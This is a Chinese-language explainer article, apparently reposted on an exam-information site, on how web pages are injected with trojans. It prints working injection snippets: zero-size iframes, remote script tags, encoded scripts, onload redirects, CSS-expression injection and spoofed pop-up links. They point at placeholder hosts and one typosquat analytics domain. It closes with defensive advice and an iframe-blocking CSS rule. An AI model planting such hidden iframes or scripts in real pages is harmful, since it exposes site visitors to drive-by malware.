各種網(wǎng)頁(yè)掛馬方式原理揭密(iframe掛馬,script 掛馬,圖片偽裝掛馬等)
來(lái)源:易賢網(wǎng) 閱讀:1056 次 日期:2016-05-12 10:39:53
溫馨提示:易賢網(wǎng)小編為您整理了“各種網(wǎng)頁(yè)掛馬方式原理揭密(iframe掛馬,script 掛馬,圖片偽裝掛馬等)”,方便廣大網(wǎng)友查閱!

(1)iframe 框架掛馬

在網(wǎng)頁(yè)上增加一行掛馬的程序,例如:

<iframe src=http://www.xxx.com/xxx.html width=0 height=0></iframe>

這種嵌入是的掛馬非常常見(jiàn),在Google中搜索發(fā)現(xiàn)的可能還有木馬的網(wǎng)頁(yè),一般都是被這種方式掛馬。這行語(yǔ)句就是在網(wǎng)頁(yè)打開(kāi)的時(shí)候,同時(shí)打開(kāi)另外一個(gè)網(wǎng)頁(yè),當(dāng)然這個(gè)網(wǎng)頁(yè)可能包含大量的木馬,也可能僅僅是為了騙取流量。

如果我們的網(wǎng)頁(yè)不使用iframe,我們可以屏蔽iframe屬性,這樣,即使網(wǎng)頁(yè)被iframe掛馬,也不會(huì)傷害到訪(fǎng)問(wèn)網(wǎng)站的用戶(hù)。

【原理】:

IE5及其以后版本支持在CSS中使用expression,用來(lái)把CSS屬性和JavaScript腳本關(guān)聯(lián)起來(lái),這里的CSS屬性可以是元素固有的屬性,也可以是自定義屬性。

我們?cè)诰W(wǎng)頁(yè)中增加如下的代碼即可屏蔽iframe屬性:

<style type=”text/css”>

iframe{a:expression(this.src=’about:blank’,this.outerHTML=”);}

</style>

iframe 也可以采用加密的方式掛馬,例如下面的代碼:

<iframe src=http://google-analitecs.com/in.cgi????? width=1 height=1></iframe>

(2)script 掛馬

通過(guò)script的調(diào)用來(lái)掛馬,可以?huà)熘苯拥膆tml文件,也可以?huà)靔s文件,可以明文掛馬,為了躲避追查,也有加密掛馬的形式,形式各異,千差萬(wàn)別,主要方式如下:

<script src=http://%11%11%11%11%11%11%11></script>

這是一個(gè)加密的掛馬語(yǔ)句;

2.1 htm文件掛馬:

通過(guò)上傳一個(gè)木馬文件(x.htm)掛馬,代碼如下:

document.write(“<div style=’display:none’>”)

document.write(“<iframe src=x.htm width=0 height=0></iframe>”)

document.write(“</div>”)

htm 掛馬代碼:

<script src=x.htm></script>

2.2 js文件掛馬

通過(guò)上傳一個(gè)木馬文件(x.js)掛馬,代碼如下:

document.write(“<iframe width=’0′ height=’0′ src=’http://xxx.com/xxx.htm’></iframe>”);

 

JS掛馬代碼:

<script language=javascript src=x.js></script>

當(dāng)然也可以?huà)旎ヂ?lián)網(wǎng)上任何一臺(tái)機(jī)器的x.js文件;

2.3  js變形加密

<SCRIPT language=”JScript.Encode” src=http://www.xxx.com/x.x></script>

(3)圖片偽裝掛馬

隨著防毒技術(shù)的發(fā)展,圖片木馬技術(shù)逃避殺毒監(jiān)視的新技術(shù),攻擊者將類(lèi)似:http://www.xxx.com/x.htm中的木馬代碼植入到x.gif圖片文

件中,這些嵌入代碼的圖片都可以用工具生成。圖片木馬生成后,再利用代碼調(diào)用執(zhí)行,是比較新穎的一種掛馬隱蔽方法,實(shí)例代碼如:

<html>

<iframe src=”http://www.x.com/x.htm” height=0 width=0></iframe>

<img src=”http://www.x.com/x.jpg”></center>

</html>

當(dāng)用戶(hù)打開(kāi)http://www.x.com/x.htm是,顯示給用戶(hù)的是http://www.x.com/x.jpg,而http://www.x.com/x.htm網(wǎng)頁(yè)代碼也隨之運(yùn)行。

(4)其它的掛馬方式

4.1 body掛馬

<body onload=”window.location=’http://xxx.com/xxx.htm’;”></body>

也可以在css的body中掛馬

body {

background-image: url(‘javascript:document.write(“<script src=http://www.xxx.com/x.js></script>”)’)}

4.2 隱蔽掛馬

top.document.body.innerHTML = top.document.body.innerHTML +

‘\r\n<iframe src=”http://www.xxx.com/xxx.htm/”></iframe>’;

4.3 java的open函數(shù)掛馬

直接調(diào)用:

<SCRIPT language=javascript>

window.open (“x.htm”,””,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1″);

</script>

欺騙調(diào)用:

<a href=”http://www.a.com(迷惑連接地址,顯示這個(gè)地址指向木馬地址)” onMouseOver=”www_a_com(); return true;”> 頁(yè)面要顯示的內(nèi)容 </a>

<SCRIPT Language=”JavaScript”>

function www_a_com ()

{

var url=”網(wǎng)馬地址”;

open(url,”NewWindow”,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,w

idth=800,height=600,left=10,top=10″);

}

</SCRIPT>

4.4 偽裝調(diào)用:

<frameset rows=”444,0″ cols=”*”>

<frame src=”a.htm” framborder=”no” scrolling=”auto” noresize marginwidth=”0″margingheight=”0″>

<frame src=”b.htm” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″>

</frameset>

形形色色的網(wǎng)頁(yè)掛馬,代碼都十分簡(jiǎn)單,所以,互聯(lián)網(wǎng)木馬想要傳播,就會(huì)不停的開(kāi)發(fā)新的掛馬方式,不停的加密隱藏自己,這樣才能逃過(guò)各種安全軟件的眼睛。其實(shí),看看上文,很多語(yǔ)句都是編程常用的代碼,只是使用的目的不一樣罷了,了解了網(wǎng)頁(yè)掛馬的原理和方法,再防范網(wǎng)頁(yè)掛馬就容易多了。

帶木馬的網(wǎng)頁(yè)主要包括兩種類(lèi)型:一種自己本身就是木馬網(wǎng)站,所有的頁(yè)面都有木馬,另一種是正常的網(wǎng)站,由于管理不善,被掛馬,成為木馬網(wǎng)站的一個(gè)中轉(zhuǎn)站,看看google中這樣的網(wǎng)站何其多,可能很多站長(zhǎng)現(xiàn)在還不知道,呵呵,多學(xué)習(xí)學(xué)習(xí)吧,站長(zhǎng)可不是那么好當(dāng)?shù)摹?/P>

不過(guò),僅僅有了網(wǎng)絡(luò)掛馬的代碼,也不一定一定能傳播木馬,只要我們加強(qiáng)防范,不讓我們的網(wǎng)頁(yè)被 掛馬,甚至,即使被掛馬了,打開(kāi)了木馬網(wǎng)頁(yè),我們的系統(tǒng)沒(méi)有漏洞,木馬網(wǎng)頁(yè)也同樣不能發(fā)揮作用的。所以,最重要的安全防范方式就是定期給系統(tǒng)打補(bǔ)丁,幾乎 所有的木馬網(wǎng)頁(yè)都無(wú)法發(fā)揮作用了。

更多信息請(qǐng)查看網(wǎng)站運(yùn)營(yíng)
由于各方面情況的不斷調(diào)整與變化,易賢網(wǎng)提供的所有考試信息和咨詢(xún)回復(fù)僅供參考,敬請(qǐng)考生以權(quán)威部門(mén)公布的正式信息和咨詢(xún)?yōu)闇?zhǔn)!

2025國(guó)考·省考課程試聽(tīng)報(bào)名

  • 報(bào)班類(lèi)型
  • 姓名
  • 手機(jī)號(hào)
  • 驗(yàn)證碼
關(guān)于我們 | 聯(lián)系我們 | 人才招聘 | 網(wǎng)站聲明 | 網(wǎng)站幫助 | 非正式的簡(jiǎn)要咨詢(xún) | 簡(jiǎn)要咨詢(xún)須知 | 加入群交流 | 手機(jī)站點(diǎn) | 投訴建議
工業(yè)和信息化部備案號(hào):滇ICP備2023014141號(hào)-1 云南省教育廳備案號(hào):云教ICP備0901021 滇公網(wǎng)安備53010202001879號(hào) 人力資源服務(wù)許可證:(云)人服證字(2023)第0102001523號(hào)
云南網(wǎng)警備案專(zhuān)用圖標(biāo)
聯(lián)系電話(huà):0871-65099533/13759567129 獲取招聘考試信息及咨詢(xún)關(guān)注公眾號(hào):hfpxwx
咨詢(xún)QQ:526150442(9:00—18:00)版權(quán)所有:易賢網(wǎng)
云南網(wǎng)警報(bào)警專(zhuān)用圖標(biāo)